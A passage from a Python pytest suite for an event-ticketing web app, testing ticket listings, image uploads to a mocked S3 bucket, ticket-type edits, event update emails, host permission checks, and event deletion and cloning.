    await factory.create_cat()
    await factory.create_user()
    await factory.create_event()
    anne = await factory.create_user(first_name='x', email='anne@example.org')
    ben = await factory.create_user(first_name='x', email='ben@example.org')
    await factory.book_free(await factory.create_reservation(anne, ben), anne)
    # set per-ticket names/donations so guest_name is populated and sortable
    await db_conn.execute(
        "UPDATE tickets SET first_name='anne', last_name='apple', extra_donated=1.23 WHERE user_id=$1", anne
    )
    await db_conn.execute(
        "UPDATE tickets SET first_name='ben', last_name='banana', extra_donated=1.23 WHERE user_id=$1", ben
    )
    await login()
    charlie = await factory.create_user(first_name='charlie', last_name='charlie', email='charlie@example.org')
    await db_conn.execute('insert into waiting_list (event, user_id) values ($1, $2)', factory.event_id, charlie)
    r = await cli.get(url('event-tickets', id=factory.event_id))
    assert r.status == 200, await r.text()
    data = await r.json()
    assert len(data['tickets']) == 2
    # sort for a deterministic comparison; response order isn't guaranteed
    tickets = sorted(data['tickets'], key=lambda t: t['guest_name'])
    tt_id = await db_conn.fetchval('SELECT id from ticket_types')
    assert tickets == [
        {
            'id': await db_conn.fetchval("SELECT id FROM tickets where first_name='anne'"),
            'ticket_id': RegexStr(r'.{7}-\d+'),
            'ticket_status': 'booked',
            'extra_info': None,
            'booked_at': CloseToNow(delta=4),
            'booking_type': 'book-free-tickets',
            'price': None,
            'extra_donated': 1.23,
            'guest_user_id': anne,
            'guest_name': 'anne apple',
            'guest_email': 'anne@example.org',
            'buyer_user_id': anne,
            'buyer_name': 'anne apple',
            'buyer_email': 'anne@example.org',
            'ticket_type_name': 'Standard',
            'ticket_type_id': tt_id,
        },
        {
            'id': await db_conn.fetchval("SELECT id FROM tickets where first_name='ben'"),
            'ticket_id': RegexStr(r'.{7}-\d+'),
            'ticket_status': 'booked',
            'extra_info': None,
            'booked_at': CloseToNow(delta=4),
            'booking_type': 'book-free-tickets',
            'price': None,
            'extra_donated': 1.23,
            'guest_user_id': ben,
            'guest_name': 'ben banana',
            'guest_email': 'ben@example.org',
            # anne bought both tickets, so she is the buyer for ben's ticket too
            'buyer_user_id': anne,
            'buyer_name': 'anne apple',
            'buyer_email': 'anne@example.org',
            'ticket_type_name': 'Standard',
            'ticket_type_id': tt_id,
        },
    ]
    assert data['waiting_list'] == [
        {'added_ts': CloseToNow(delta=4), 'name': 'charlie charlie', 'email': 'charlie@example.org'}
    ]
async def test_tickets_dont_repeat(cli, url, db_conn, factory: Factory, login):
    """Two tickets bought by the same buyer for themselves are listed once each, not duplicated."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user(first_name='T', last_name='B', email='ticket.buyer@example.org')
    await factory.create_event(status='published', price=10)
    await login(email='ticket.buyer@example.org')
    # reserve two tickets, both with the buyer's own email
    data = {
        'tickets': [
            {'t': True, 'email': 'ticket.buyer@example.org'},
            {'t': True, 'email': 'ticket.buyer@example.org'},
        ],
        'ticket_type': factory.ticket_type_id,
    }
    r = await cli.json_post(url('event-reserve-tickets', id=factory.event_id), data=data)
    assert r.status == 200, await r.text()
    action_id = (await r.json())['action_id']
    # simulate stripe confirming the payment, which books the tickets
    await factory.fire_stripe_webhook(action_id)
    assert 2 == await db_conn.fetchval('select count(*) from tickets')
    r = await cli.get(url('event-tickets', id=factory.event_id))
    assert r.status == 200, await r.text()
    data = await r.json()
    assert len(data['tickets']) == 2
async def test_image_existing(cli, url, factory: Factory, db_conn, login, dummy_server):
    """Selecting an existing bucket image sets events.image without any S3 calls."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user(role='host')
    await factory.create_event()
    await login()
    assert dummy_server.app['log'] == []
    r = await cli.json_post(
        url('event-set-image-existing', id=factory.event_id),
        data={'image': 'https://testingbucket.example.org/testing.png'},
    )
    assert r.status == 200, await r.text()
    assert 'https://testingbucket.example.org/testing.png' == await db_conn.fetchval('SELECT image FROM events')
    # no delete/upload requests — the event had no previous image
    assert dummy_server.app['log'] == []
async def test_image_existing_past(cli, url, factory: Factory, login):
    """Setting an image on a past event is forbidden (403)."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user(role='host')
    await factory.create_event(start_ts=datetime(2000, 1, 1))
    await login()
    r = await cli.json_post(
        url('event-set-image-existing', id=factory.event_id),
        data={'image': 'https://testingbucket.example.org/testing.png'},
    )
    assert r.status == 403, await r.text()
    assert {'message': "you can't modify past events"} == await r.json()
async def test_image_existing_bad(cli, url, factory: Factory, db_conn, login, dummy_server):
    """An image URL outside the company bucket is rejected with 400 and nothing is stored."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user()
    await factory.create_event()
    await login()
    # foobar.example.org is not the configured bucket host
    r = await cli.json_post(
        url('event-set-image-existing', id=factory.event_id), data={'image': 'https://foobar.example.org/testing.png'}
    )
    assert r.status == 400, await r.text()
    assert None is await db_conn.fetchval('SELECT image FROM events')
    assert dummy_server.app['log'] == []
async def test_image_existing_wrong_host(cli, url, factory: Factory, db_conn, login, dummy_server):
    """A host cannot set the image on another host's event (403, no change, no S3 calls)."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user(role='host')
    user_id = await factory.create_user(email='admin@example.org')
    await factory.create_event(host_user_id=user_id)
    await login()
    r = await cli.json_post(
        url('event-set-image-existing', id=factory.event_id),
        data={'image': 'https://testingbucket.example.org/testing.png'},
    )
    assert r.status == 403, await r.text()
    assert None is await db_conn.fetchval('SELECT image FROM events')
    data = await r.json()
    assert data == {'message': 'user is not the host of this event'}
    assert dummy_server.app['log'] == []
async def test_image_existing_wrong_id(cli, url, factory: Factory, login, dummy_server):
    """Setting the image on a non-existent event id returns 404 with no S3 calls."""
    await factory.create_company()
    await factory.create_user()
    await login()
    r = await cli.json_post(
        url('event-set-image-existing', id=1), data={'image': 'https://testingbucket.example.org/testing.png'}
    )
    assert r.status == 404, await r.text()
    assert dummy_server.app['log'] == []
async def test_image_existing_delete(cli, url, factory: Factory, db_conn, login, dummy_server):
    """Replacing an event image deletes the previous main and thumb objects from the bucket."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user()
    await factory.create_event(image='https://testingbucket.example.org/main.png')
    await login()
    r = await cli.json_post(
        url('event-set-image-existing', id=factory.event_id),
        data={'image': 'https://testingbucket.example.org/testing.png'},
    )
    assert r.status == 200, await r.text()
    assert 'https://testingbucket.example.org/testing.png' == await db_conn.fetchval('SELECT image FROM events')
    # old image and its thumbnail are both removed; order doesn't matter
    assert set(dummy_server.app['log']) == {
        'DELETE aws_endpoint_url/testingbucket.example.org/main.png',
        'DELETE aws_endpoint_url/testingbucket.example.org/thumb.png',
    }
async def test_image_new(cli, url, factory: Factory, db_conn, login, dummy_server):
    """Uploading a new image deletes the old main/thumb and PUTs a new main/thumb pair."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user()
    await factory.create_event(image='https://testingbucket.example.org/main.png')
    await login()
    data = FormData()
    data.add_field('image', create_image(), filename='testing.png', content_type='application/octet-stream')
    # multipart POST needs Referer/Origin headers to pass the CSRF check
    r = await cli.post(
        url('event-set-image-new', id=factory.event_id),
        data=data,
        headers={
            'Referer': f'http://127.0.0.1:{cli.server.port}/foobar/',
            'Origin': f'http://127.0.0.1:{cli.server.port}',
        },
    )
    assert r.status == 200, await r.text()
    img_path = await db_conn.fetchval('SELECT image FROM events')
    # new image is stored under a random path segment within the event's folder
    assert img_path == RegexStr(
        r'https://testingbucket.example.org/tests/testing/' r'supper-clubs/the-event-name/\w+/main.png'
    )
    # debug(dummy_server.app['log'])
    assert sorted(dummy_server.app['log']) == [
        'DELETE aws_endpoint_url/testingbucket.example.org/main.png',
        'DELETE aws_endpoint_url/testingbucket.example.org/thumb.png',
        RegexStr(
            r'PUT aws_endpoint_url/testingbucket.example.org/tests/testing/supper-clubs/'
            r'the-event-name/\w+?/main.png'
        ),
        RegexStr(
            r'PUT aws_endpoint_url/testingbucket.example.org/tests/testing/supper-clubs/'
            r'the-event-name/\w+?/thumb.png'
        ),
    ]
async def test_add_ticket_type(cli, url, factory: Factory, db_conn, login):
    """Posting the existing ticket type plus a new one keeps the original and inserts the new type."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user()
    await factory.create_event()
    await login()
    assert 1 == await db_conn.fetchval('SELECT COUNT(*) FROM ticket_types where mode=$1', 'ticket')
    r = await cli.get(url('event-ticket-types', id=factory.event_id))
    assert r.status == 200, await r.text()
    data = await r.json()
    ticket_types = [data['ticket_types'][0]]
    assert len(ticket_types) == 1
    # append a second type to the payload alongside the existing one
    ticket_types.append({'name': 'Foobar', 'price': 123.5, 'slots_used': 2, 'active': False, 'mode': 'ticket'})
    r = await cli.json_post(url('update-event-ticket-types', id=factory.event_id), data={'ticket_types': ticket_types})
    assert r.status == 200, await r.text()
    ticket_types = [dict(r) for r in await db_conn.fetch('SELECT * FROM ticket_types WHERE mode=$1', 'ticket')]
    assert ticket_types == [
        {
            'id': AnyInt(),
            'event': factory.event_id,
            'name': 'Standard',
            'price': None,
            'mode': 'ticket',
            'slots_used': 1,
            'active': True,
            'custom_amount': False,
        },
        {
            'id': AnyInt(),
            'event': factory.event_id,
            'name': 'Foobar',
            # price stored as a 2-dp Decimal
            'price': Decimal('123.50'),
            'mode': 'ticket',
            'slots_used': 2,
            'active': False,
            'custom_amount': False,
        },
    ]
async def test_delete_ticket_type(cli, url, factory: Factory, db_conn, login):
    """Posting a payload without the existing type's id replaces it: old row deleted, new row inserted."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user()
    await factory.create_event()
    await login()
    tt_id = await db_conn.fetchval('SELECT id FROM ticket_types')
    # no 'id' field, so the existing type is dropped and this one created
    data = {'ticket_types': [{'name': 'xxx', 'price': 12.3, 'slots_used': 50, 'active': True}]}
    r = await cli.json_post(url('update-event-ticket-types', id=factory.event_id), data=data)
    assert r.status == 200, await r.text()
    ticket_types = [dict(r) for r in await db_conn.fetch('SELECT * FROM ticket_types where mode=$1', 'ticket')]
    assert ticket_types == [
        {
            'id': AnyInt(),
            'event': factory.event_id,
            'name': 'xxx',
            'price': Decimal('12.30'),
            'slots_used': 50,
            'mode': 'ticket',
            'active': True,
            'custom_amount': False,
        },
    ]
    # confirm the row really was replaced, not updated in place
    assert ticket_types[0]['id'] != tt_id
async def test_delete_wrong_ticket_type(cli, url, factory: Factory, login):
    """A ticket type with tickets reserved against it cannot be deleted (400)."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user()
    await factory.create_event()
    # a reservation ties a ticket to the existing type
    await factory.create_reservation()
    await login()
    data = {'ticket_types': [{'name': 'xxx', 'price': 12.3, 'slots_used': 50, 'active': True}]}
    r = await cli.json_post(url('update-event-ticket-types', id=factory.event_id), data=data)
    assert r.status == 400, await r.text()
    data = await r.json()
    assert data == {
        'message': 'ticket types deleted which have ticket associated with them',
    }
async def test_edit_ticket_type(cli, url, factory: Factory, db_conn, login):
    """Posting a payload that includes the existing type's id updates that row in place."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user()
    await factory.create_event()
    await login()
    tt_id = await db_conn.fetchval('SELECT id FROM ticket_types')
    data = {'ticket_types': [{'id': tt_id, 'name': 'xxx', 'price': 12.3, 'slots_used': 50, 'active': True}]}
    r = await cli.json_post(url('update-event-ticket-types', id=factory.event_id), data=data)
    assert r.status == 200, await r.text()
    ticket_types = [dict(r) for r in await db_conn.fetch('SELECT * FROM ticket_types where mode=$1', 'ticket')]
    assert ticket_types == [
        {
            # same id — updated, not replaced
            'id': tt_id,
            'event': factory.event_id,
            'name': 'xxx',
            'price': Decimal('12.30'),
            'mode': 'ticket',
            'slots_used': 50,
            'active': True,
            'custom_amount': False,
        },
    ]
@pytest.mark.parametrize(
    'get_input,response_contains',
    [
        # missing required fields on an update
        (lambda tt_id: [{'id': tt_id, 'name': 'foobar'}], '"msg": "field required"'),
        # id that doesn't belong to this event
        (
            lambda tt_id: [{'id': 999, 'name': 'x', 'slots_used': 1, 'active': True}],
            '"message": "wrong ticket updated"',
        ),
        # deactivating the only ticket type
        (
            lambda tt_id: [{'id': tt_id, 'name': 'x', 'slots_used': 1, 'active': False}],
            '"msg": "at least 1 ticket type must be active"',
        ),
    ],
)
async def test_invalid_ticket_updates(get_input, response_contains, cli, url, factory: Factory, db_conn, login):
    """Each invalid ticket-types payload yields a 400 whose body contains the expected message."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user()
    await factory.create_event()
    await login()
    tt_id = await db_conn.fetchval("SELECT id FROM ticket_types where mode='ticket'")
    ticket_types = get_input(tt_id)
    r = await cli.json_post(url('update-event-ticket-types', id=factory.event_id), data={'ticket_types': ticket_types})
    assert r.status == 400, await r.text()
    assert response_contains in await r.text()
async def test_event_updates_sent(cli, url, login, factory: Factory, dummy_server):
    """Sending an event update emails ticket holders and is listed by event-updates-sent."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user()
    await factory.create_event(price=10)
    await login()
    anne = await factory.create_user(first_name='anne', email='anne@example.org')
    await factory.buy_tickets(await factory.create_reservation(anne, None))
    # buying tickets sends one confirmation email
    assert len(dummy_server.app['emails']) == 1
    data = dict(subject='This is a test email & whatever', message='this is the **message**.')
    r = await cli.json_post(url('event-send-update', id=factory.event_id), data=data)
    assert r.status == 200, await r.text()
    assert len(dummy_server.app['emails']) == 2
    r = await cli.get(url('event-updates-sent', id=factory.event_id))
    assert r.status == 200, await r.text()
    data = await r.json()
    assert data == {
        'event_updates': [
            {
                'message': 'this is the **message**.',
                'subject': 'This is a test email & whatever',
                'ts': CloseToNow(delta=4),
            }
        ]
    }
async def test_event_updates_past(cli, url, login, factory: Factory, dummy_server, db_conn):
    """Updates can be sent repeatedly for a future event but are forbidden once it's in the past."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user(role='host')
    await factory.create_event()
    await login()
    anne = await factory.create_user(first_name='anne', email='anne@example.org')
    await factory.book_free(await factory.create_reservation(anne, None), anne)
    data = dict(subject='This is a test email & whatever', message='this is the **message**.')
    r = await cli.json_post(url('event-send-update', id=factory.event_id), data=data)
    assert r.status == 200, await r.text()
    assert len(dummy_server.app['emails']) == 1
    r = await cli.json_post(url('event-send-update', id=factory.event_id), data=data)
    assert r.status == 200, await r.text()
    assert len(dummy_server.app['emails']) == 2
    # once the event has started, further updates are rejected and no email is sent
    await db_conn.execute("UPDATE events SET start_ts=now() - '1 hour'::interval")
    r = await cli.json_post(url('event-send-update', id=factory.event_id), data=data)
    assert r.status == 403, await r.text()
    assert {'message': "you can't modify past events"} == await r.json()
    assert len(dummy_server.app['emails']) == 2
async def test_send_event_update_wrong_user(cli, url, login, factory: Factory):
    """A host cannot send updates for another host's event (403)."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user(role='host')
    user2 = await factory.create_user(role='host', email='user2@example.org')
    await factory.create_event(price=10, host_user_id=user2)
    await login()
    data = dict(subject='This is a test email & whatever', message='this is the **message**.')
    r = await cli.json_post(url('event-send-update', id=factory.event_id), data=data)
    assert r.status == 403, await r.text()
async def test_send_event_update_no_event(cli, url, login, factory: Factory):
    """Sending an update for a non-existent event id returns 404."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user()
    await login()
    data = dict(subject='This is a test email & whatever', message='this is the **message**.')
    r = await cli.json_post(url('event-send-update', id=999), data=data)
    assert r.status == 404, await r.text()
async def test_event_updates_none(cli, url, login, factory: Factory):
    """event-updates-sent returns an empty list when no updates have been sent."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user()
    await factory.create_event()
    await login()
    r = await cli.get(url('event-updates-sent', id=factory.event_id))
    assert r.status == 200, await r.text()
    data = await r.json()
    assert data == {'event_updates': []}
async def test_event_updates_wrong_event(cli, url, login, factory: Factory):
    """A host cannot list updates for another host's event (403)."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user(role='host')
    user2 = await factory.create_user(role='host', email='user2@example.org')
    await factory.create_event(price=10, host_user_id=user2)
    await login()
    r = await cli.get(url('event-updates-sent', id=factory.event_id))
    assert r.status == 403, await r.text()
@pytest.mark.parametrize('previous_status', [True, False])
async def test_event_switch_status(previous_status, cli, url, login, factory: Factory, db_conn):
    """event-switch-highlight toggles the highlight flag from either starting value."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user()
    await factory.create_event(price=10)
    await login()
    await db_conn.execute('UPDATE events SET highlight=$1', previous_status)
    r = await cli.json_post(url('event-switch-highlight', id=factory.event_id))
    assert r.status == 200, await r.text()
    h = await db_conn.fetchval('SELECT highlight FROM events')
    assert h == (not previous_status)
async def test_delete_event(cli, url, factory: Factory, db_conn, login):
    """Deleting an event cascades to its ticket types and tickets, leaving other events intact."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user()
    await factory.create_event()
    await login()
    await factory.create_reservation()
    # second event with its own reservation to confirm deletion is scoped
    event2 = await factory.create_event(slug='event2')
    ticket_type = await db_conn.fetchval('SELECT id FROM ticket_types WHERE event=$1', event2)
    await factory.create_reservation(event_id=event2, ticket_type_id=ticket_type)
    assert 2 == await db_conn.fetchval('SELECT count(*) FROM events')
    assert 6 == await db_conn.fetchval('SELECT count(*) FROM ticket_types')
    assert 2 == await db_conn.fetchval('SELECT count(*) FROM tickets')
    r = await cli.json_post(url('event-delete', pk=factory.event_id))
    assert r.status == 200, await r.text()
    # only the first event and its dependents are gone
    assert 1 == await db_conn.fetchval('SELECT count(*) FROM events')
    assert 3 == await db_conn.fetchval('SELECT count(*) FROM ticket_types')
    assert 1 == await db_conn.fetchval('SELECT count(*) FROM tickets')
async def test_delete_event_host(cli, url, factory: Factory, db_conn, login):
    """A host-role user may not delete events (403) and the event remains."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user(role='host')
    await factory.create_event()
    await login()
    await factory.create_reservation()
    assert 1 == await db_conn.fetchval('SELECT count(*) FROM events')
    r = await cli.json_post(url('event-delete', pk=factory.event_id))
    assert r.status == 403, await r.text()
    assert 1 == await db_conn.fetchval('SELECT count(*) FROM events')
async def test_secondary_image(cli, url, factory: Factory, db_conn, login, dummy_server):
    """Uploading a secondary image stores it under .../secondary/<rand>/main.png with a single PUT (no thumb)."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user()
    await factory.create_event()
    await login()
    data = FormData()
    data.add_field('image', create_image(), filename='testing.png', content_type='application/octet-stream')
    # multipart POST needs Referer/Origin headers to pass the CSRF check
    r = await cli.post(
        url('event-set-image-secondary', id=factory.event_id),
        data=data,
        headers={
            'Referer': f'http://127.0.0.1:{cli.server.port}/foobar/',
            'Origin': f'http://127.0.0.1:{cli.server.port}',
        },
    )
    assert r.status == 200, await r.text()
    img_path = await db_conn.fetchval('SELECT secondary_image FROM events')
    assert img_path == RegexStr(
        r'https://testingbucket.example.org/tests/testing/supper-clubs/the-event-name/secondary/\w+/main.png'
    )
    # exactly one upload — secondary images get no thumbnail
    assert dummy_server.app['log'] == [
        RegexStr(
            r'PUT aws_endpoint_url/testingbucket.example.org/tests/testing/'
            r'supper-clubs/the-event-name/secondary/\w+/main.png'
        ),
    ]
async def test_secondary_image_exists(cli, url, factory: Factory, db_conn, login, dummy_server):
    """Uploading a secondary image deletes the previous main/thumb objects before the new PUT."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user()
    await factory.create_event()
    await login()
    event_path = 'testingbucket.example.org/tests/testing/supper-clubs/the-event-name'
    img_url = f'https://{event_path}/secondary/xxx123/main.png'
    # pretend a secondary image already exists
    await db_conn.execute('update events set secondary_image=$1', img_url)
    data = FormData()
    data.add_field('image', create_image(), filename='testing.png', content_type='application/octet-stream')
    r = await cli.post(
        url('event-set-image-secondary', id=factory.event_id),
        data=data,
        headers={
            'Referer': f'http://127.0.0.1:{cli.server.port}/foobar/',
            'Origin': f'http://127.0.0.1:{cli.server.port}',
        },
    )
    assert r.status == 200, await r.text()
    assert sorted(dummy_server.app['log']) == [
        f'DELETE aws_endpoint_url/{event_path}/secondary/xxx123/main.png',
        f'DELETE aws_endpoint_url/{event_path}/secondary/xxx123/thumb.png',
        RegexStr(rf'PUT aws_endpoint_url/{event_path}/secondary/\w+/main.png'),
    ]
async def test_remove_secondary_image_(cli, url, factory: Factory, db_conn, login, dummy_server):
    """Removing the secondary image deletes its bucket objects; a repeat call is a harmless no-op."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user()
    await factory.create_event()
    await login()
    event_path = 'testingbucket.example.org/tests/testing/supper-clubs/the-event-name'
    img_url = f'https://{event_path}/secondary/xxx123/main.png'
    await db_conn.execute('update events set secondary_image=$1', img_url)
    r = await cli.json_post(url('event-remove-image-secondary', id=factory.event_id))
    assert r.status == 200, await r.text()
    assert sorted(dummy_server.app['log']) == [
        f'DELETE aws_endpoint_url/{event_path}/secondary/xxx123/main.png',
        f'DELETE aws_endpoint_url/{event_path}/secondary/xxx123/thumb.png',
    ]
    assert None is await db_conn.fetchval('select secondary_image from events where id=$1', factory.event_id)
    # second removal: still 200, no extra S3 calls logged
    r = await cli.json_post(url('event-remove-image-secondary', id=factory.event_id))
    assert r.status == 200, await r.text()
    assert sorted(dummy_server.app['log']) == [
        f'DELETE aws_endpoint_url/{event_path}/secondary/xxx123/main.png',
        f'DELETE aws_endpoint_url/{event_path}/secondary/xxx123/thumb.png',
    ]
    assert None is await db_conn.fetchval('select secondary_image from events where id=$1', factory.event_id)
async def test_description_image(cli, url, factory: Factory, db_conn, login, dummy_server):
    """Uploading a description image stores it under .../description/<rand>/ and PUTs main + thumb."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user()
    await factory.create_event()
    await login()
    data = FormData()
    data.add_field('image', create_image(), filename='testing.png', content_type='application/octet-stream')
    # multipart POST needs Referer/Origin headers to pass the CSRF check
    r = await cli.post(
        url('event-set-image-description', id=factory.event_id),
        data=data,
        headers={
            'Referer': f'http://127.0.0.1:{cli.server.port}/foobar/',
            'Origin': f'http://127.0.0.1:{cli.server.port}',
        },
    )
    assert r.status == 200, await r.text()
    img_path = await db_conn.fetchval('SELECT description_image FROM events')
    assert img_path == RegexStr(
        r'https://testingbucket.example.org/tests/testing/supper-clubs/the-event-name/description/\w+/main.png'
    )
    # unlike secondary images, description images also get a thumbnail
    assert sorted(dummy_server.app['log']) == [
        RegexStr(
            r'PUT aws_endpoint_url/testingbucket.example.org/tests/testing/'
            r'supper-clubs/the-event-name/description/\w+/main.png'
        ),
        RegexStr(
            r'PUT aws_endpoint_url/testingbucket.example.org/tests/testing/'
            r'supper-clubs/the-event-name/description/\w+/thumb.png'
        ),
    ]
async def test_description_image_exists(cli, url, factory: Factory, db_conn, login, dummy_server):
    """Uploading a description image deletes the previous main/thumb before uploading the new pair."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user()
    await factory.create_event()
    await login()
    event_path = 'testingbucket.example.org/tests/testing/supper-clubs/the-event-name'
    img_url = f'https://{event_path}/description/xxx123/main.png'
    # pretend a description image already exists
    await db_conn.execute('update events set description_image=$1', img_url)
    data = FormData()
    data.add_field('image', create_image(), filename='testing.png', content_type='application/octet-stream')
    r = await cli.post(
        url('event-set-image-description', id=factory.event_id),
        data=data,
        headers={
            'Referer': f'http://127.0.0.1:{cli.server.port}/foobar/',
            'Origin': f'http://127.0.0.1:{cli.server.port}',
        },
    )
    assert r.status == 200, await r.text()
    assert sorted(dummy_server.app['log']) == [
        f'DELETE aws_endpoint_url/{event_path}/description/xxx123/main.png',
        f'DELETE aws_endpoint_url/{event_path}/description/xxx123/thumb.png',
        RegexStr(rf'PUT aws_endpoint_url/{event_path}/description/\w+/main.png'),
        RegexStr(rf'PUT aws_endpoint_url/{event_path}/description/\w+/thumb.png'),
    ]
async def test_remove_description_image_(cli, url, factory: Factory, db_conn, login, dummy_server):
    """Removing the description image deletes its bucket objects; a repeat call is a harmless no-op."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user()
    await factory.create_event()
    await login()
    event_path = 'testingbucket.example.org/tests/testing/supper-clubs/the-event-name'
    img_url = f'https://{event_path}/description/xxx123/main.png'
    await db_conn.execute('update events set description_image=$1', img_url)
    r = await cli.json_post(url('event-remove-image-description', id=factory.event_id))
    assert r.status == 200, await r.text()
    assert sorted(dummy_server.app['log']) == [
        f'DELETE aws_endpoint_url/{event_path}/description/xxx123/main.png',
        f'DELETE aws_endpoint_url/{event_path}/description/xxx123/thumb.png',
    ]
    assert None is await db_conn.fetchval('select description_image from events where id=$1', factory.event_id)
    # second removal: still 200, no extra S3 calls logged
    r = await cli.json_post(url('event-remove-image-description', id=factory.event_id))
    assert r.status == 200, await r.text()
    assert sorted(dummy_server.app['log']) == [
        f'DELETE aws_endpoint_url/{event_path}/description/xxx123/main.png',
        f'DELETE aws_endpoint_url/{event_path}/description/xxx123/thumb.png',
    ]
    assert None is await db_conn.fetchval('select description_image from events where id=$1', factory.event_id)
async def test_clone_event(cli, url, factory: Factory, db_conn, login):
    """Cloning an event creates one new row with fields copied from the source.

    Name, date and status come from the request payload; descriptions, intro,
    ticket_limit and the public flag are carried over from the source event,
    while runtime state is reset (tickets_taken=0, images None).
    """
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user()
    await factory.create_event(
        name='First Event',
        ticket_limit=42,
        public=False,
        status='pending',
        short_description='this is short',
        long_description='this is long',
        description_intro='this is some intro texxxt',
    )
    await login()
    data = dict(
        name='New Event', date={'dt': datetime(2032, 2, 1, 19).strftime('%s'), 'dur': 7200}, status='published',
    )
    r = await cli.json_post(url('event-clone', id=factory.event_id), data=data)
    assert r.status == 201, await r.text()
    # Exactly one event besides the original should now exist.
    assert await db_conn.fetchval('select count(*) from events where id!=$1', factory.event_id) == 1
    new_event_id = await db_conn.fetchval('select id from events where id!=$1', factory.event_id)
    assert await r.json() == {'id': new_event_id}
    # Compare the whole cloned row field by field.
    data = await db_conn.fetchrow('select * from events where id=$1', new_event_id)
    assert dict(data) == {
        'id': new_event_id,
        'category': factory.category_id,
        'status': 'published',
        'host': factory.user_id,
        'name': 'New Event',
        'slug': 'new-event',
        'highlight': False,
        'allow_tickets': True,
        'allow_donations': False,
        'external_ticket_url': None,
        'external_donation_url': None,
        'start_ts': datetime(2032, 2, 1, 19, 0, tzinfo=timezone.utc),
        'timezone': 'Europe/London',
        'duration': timedelta(0, 7200),
        'youtube_video_id': None,
        'short_description': 'this is short',
        'long_description': 'this is long',
        'description_intro': 'this is some intro texxxt',
        'description_image': None,
        'public': False,
        'location_name': None,
        'location_lat': None,
        'location_lng': None,
        'ticket_limit': 42,
        'donation_target': None,
        'tickets_taken': 0,
        'image': None,
        'secondary_image': None,
    }
    # The clone also gets its own ticket types (three rows here).
    assert await db_conn.fetchval('select count(*) from ticket_types where event=$1', new_event_id) == 3
async def test_clone_event_ticket_types(cli, url, factory: Factory, db_conn, login):
    """Cloning an event copies all five of its ticket types, including custom ones.

    Two extra ticket types ('foo', 'bar') are inserted on top of the three the
    event already has; the clone must end up with the same five, with prices,
    slots_used, mode and custom_amount preserved.
    """
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user()
    event_id = await factory.create_event()
    await db_conn.execute(
        """
        insert into ticket_types (event, name, price, slots_used) values
        ($1, 'foo', 123, 3),
        ($1, 'bar', 54.32, null)
        """,
        event_id,
    )
    # 3 existing types plus the 2 inserted above.
    assert await db_conn.fetchval('select count(*) from ticket_types where event=$1', event_id) == 5
    await login()
    data = dict(
        name='New Event', date={'dt': datetime(2032, 2, 1, 19).strftime('%s'), 'dur': 7200}, status='published',
    )
    r = await cli.json_post(url('event-clone', id=factory.event_id), data=data)
    assert r.status == 201, await r.text()
    assert await db_conn.fetchval('select count(*) from events where id!=$1', factory.event_id) == 1
    new_event_id = (await r.json())['id']
    ticket_types = await db_conn.fetch(
        'select event, name, price, slots_used, mode, custom_amount from ticket_types where event=$1 order by id',
        new_event_id,
    )
    assert [dict(r) for r in ticket_types] == [
        {
            'event': new_event_id,
            'name': 'Standard',
            'price': None,
            'slots_used': 1,
            'mode': 'ticket',
            'custom_amount': False,
        },
        {
            'event': new_event_id,
            'name': 'Standard',
            'price': Decimal('10.00'),
            'slots_used': 1,
            'mode': 'donation',
            'custom_amount': False,
        },
        {
            'event': new_event_id,
            'name': 'Custom Amount',
            'price': None,
            'slots_used': 1,
            'mode': 'donation',
            'custom_amount': True,
        },
        {
            'event': new_event_id,
            'name': 'foo',
            'price': Decimal('123.00'),
            'slots_used': 3,
            'mode': 'ticket',
            'custom_amount': False,
        },
        {
            'event': new_event_id,
            'name': 'bar',
            'price': Decimal('54.32'),
            'slots_used': None,
            'mode': 'ticket',
            'custom_amount': False,
        },
    ]
async def test_clone_event_slug(cli, url, factory: Factory, db_conn, login):
    """Cloning an event with the same name de-duplicates the slug with a 4-char suffix.

    The highlight flag is carried over to the clone.
    """
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user()
    await factory.create_event(name='Event', slug='event', status='pending', highlight=True)
    await login()
    data = dict(name='Event', date={'dt': datetime(2032, 2, 1, 19).strftime('%s'), 'dur': 7200}, status='published')
    r = await cli.json_post(url('event-clone', id=factory.event_id), data=data)
    assert r.status == 201, await r.text()
    h, name, slug = await db_conn.fetchrow('select highlight, name, slug from events where status=$1', 'published')
    assert h is True
    assert name == 'Event'
    # 'event' is taken, so the clone's slug gets a random four-character suffix.
    assert re.fullmatch('event-....', slug)
async def test_clone_event_guest(cli, url, factory: Factory, login):
    """Users with the 'host' role are forbidden (403) from cloning events."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user(role='host')
    await factory.create_event()
    await login()
    data = dict(name='Event', date={'dt': datetime(2032, 2, 1, 19).strftime('%s'), 'dur': 7200}, status='published')
    r = await cli.json_post(url('event-clone', id=factory.event_id), data=data)
    assert r.status == 403, await r.text()
async def test_clone_event_not_found(cli, url, factory: Factory, login):
    """Cloning a non-existent event id returns 404."""
    await factory.create_company()
    await factory.create_cat()
    await factory.create_user()
